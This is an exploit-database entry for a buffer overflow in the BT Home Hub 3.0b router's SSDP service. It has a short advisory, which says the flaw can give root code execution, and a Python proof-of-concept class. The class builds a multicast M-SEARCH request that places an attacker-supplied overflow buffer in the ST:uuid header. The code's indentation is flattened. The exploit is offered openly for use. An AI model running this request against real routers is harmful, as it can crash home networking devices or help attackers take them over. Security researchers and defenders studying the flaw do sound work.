BT Home Hub - uuid Buffer Overflow

2013-01-08T00:00:00
ID EXPLOITPACK:07FF0C16F6352D2B5F83F3726BBB0F22
Type exploitpack
Reporter Zachary Cutlip
Modified 2013-01-08T00:00:00

Description

BT Home Hub - uuid Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/57243/info

BT Home Hub is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.

An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Failed exploit attempts will likely crash the affected application.

BT Home Hub 3.0b is vulnerable; other versions may also be affected.

# 
*******************************************************************************
# 
*******************************************************************************
# ***************** These files are licensed GPLv2. ****************
# ******************* See included LICENSE for more info. 
*******************
# 
*******************************************************************************
# 
*******************************************************************************
# ************************ From your leet hacking cr3w 
************************
# ******************************* *******************************
# ********************************** at 
**********************************
# ************ http://www.tacnetsol.com ***********
# 
*******************************************************************************
# Copyright (c) 2013 Zachary Cutlip
# Tactical Network Solutions, LLC
class MsearchCrash:
def __init__(self,overflowbuffer):
self.__msearch_text__=\
"M-SEARCH * HTTP/1.1\r\n"+\
"HOST:239.255.255.250:1900\r\n"+\
"ST:uuid:"+str(overflowbuffer)+"\r\n"\
"MX:2\r\n"+\
'MAN:"ssdp:discover"'+"\r\n\r\n"

def __str__(self):
return self.__msearch_text__